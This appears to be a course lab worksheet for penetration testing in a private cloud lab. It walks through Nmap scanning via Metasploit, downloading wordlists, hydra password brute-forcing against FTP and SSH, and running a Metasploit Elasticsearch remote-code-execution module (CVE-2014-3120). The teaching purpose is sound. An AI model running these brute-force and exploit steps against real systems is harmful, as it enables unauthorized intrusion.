z‐old Part 2 labs

You must have lab running

Scan, Collect & Document what services are we running on victims?

• Victim IP addresses: 10.0.0.10 & 10.0.0.21 (2)

• Using Metasploit and Nmap together as a scanner

• IN KALI

• @ $

•   bash
  

• this is an insecure shortcut for production systems

•   sudo -i
  

• @ root

•   msfconsole
  

• @ msf6>

•   db_nmap -sS -A 10.0.0.10-21
  

•   services
  

• Document

• IN Artifact repository Manually (google sheet/ YOUR copy and paste)

• Copy output to Vulnerabilities 1 tab (still unconfirmed)

• https://docs.google.com/spreadsheets/d/1PMK589QX5tC9KAMsuoTnR2uVhEVh8830xJNC0N0zdyM/edit?usp=sharing

• Reformat

• IN KALI

• @ msf6>

•   exit
  

• !!!done!!!

Upload large password lists & expsec possible user list

• IN KALI
• @ root

•   apt -y install seclists
  

•   seclists -h
  

• Upload expsec possible user list & custom password list
• Shortcut: I put cleaned expsec (this takes planning & process)
• User list on AWS S3
• ` Using wget & moving into correct directory
• IN KALI
• @ root

•   wget https://ceh-v11-20220609.s3.amazonaws.com/expsecusers.txt
  

•   mv expsecusers.txt /usr/share/seclists/Usernames/
  

•   wget https://ceh-v11-20220609.s3.amazonaws.com/expsec-passwords.txt
  

•   mv expsec-passwords.txt /usr/share/seclists/Passwords/
  

• !!!done!!!

Password Guessing against 2 targets running FTP & SSH

• Using hydra
• From Scan: Port 21 & 22 are open on .10 & .21
• From seclist we have multiple list (one real short, one fake because the lab can't take 122 hrs)
• make 2 target lists by echoing data into a file
• IN KALI
• @ root

•   echo '10.0.0.10:21' >> targetsFTP.txt
  

•   echo '10.0.0.21:21' >> targetsFTP.txt
  

•   echo '10.0.0.10:22' >> targetsSSH.txt && echo '10.0.0.21:22' >> targetsSSH.txt	
  

• verify your file contents

•   cat targetsFTP.txt
  

•   cat targetsSSH.txt
  

• verify if you are in /usr/share/seclist (see 2 target files above)

•   ls
  

• execute password attack

•   hydra -L ./Usernames/expsecusers.txt  -P ./Passwords/expsec-passwords.txt -M targetsFTP.txt ftp	
  

•   hydra -L ./Usernames/expsecusers.txt  -P ./Passwords/expsec-passwords.txt -M targetsSSH.txt ssh		
  

• Who do we get?
• Document
• IN Artifact repository Manually (google sheet/ your copy and paste)
• Copy output to Vulnerabilities 1 tab (still unconfirmed)
• Reformat
• !!!done!!!

Vulnerability search: for three found

• ProFTPD 1.3.5
• Oracle Glassfish Application Server
• wap-wsp / port 9200
• (for last one google: what is wap-wsp / port 9200)
• Research using both:
• https://nvd.nist.gov/vuln/search
• https://www.exploit-db.com/
• Document
• IN Artifact repository Manually (google sheet/ your copy and paste)
• Pretend you have all three of these in your organization
• Which is worse and why?
• !!!done!!!

Exploit

• We have SSH so we can do anything. But we are not.
• Start a SSH instance and escalate priv.
• IN KALI
• @ root

•   ssh 10.0.0.21 -l boba_fett
  

• Supply password from your Artifact's sheet

•   CTRL Z
  

• You now have a remote shell on the windows victim ( it will NOT act like your Kali terminal)
• What you can do depends on microsoft administrator skills.
• Exploit port 9200
• IN KALI
• @ msf6>
• ? what services have we captured

•   services
  

• ? use exploit (CVE-2014-3120)
• I am not giving you the settings for set ( you must think and apply what you have learned)

•   use exploit/multi/elasticsearch/script_mvel_rce
  

•   set RHOST
  

•   set LHOST
  

•   set RPORT
  

•   set LPORT 4444
  

• normally we set PAYLOAD but we are trying to verify exploit only

•   run
  

• returned message: Exploit completed, but no session was created.
• !!!done!!!

Repeat this 300 times and you have a full penetration test.

SHUT DOWN ALL MACHINES IF YOU WANT TO KEEP PAYING AND RESTART LAB

DELETE CLOUD FORMATION & DETELE AMI'S TO STOP PAYING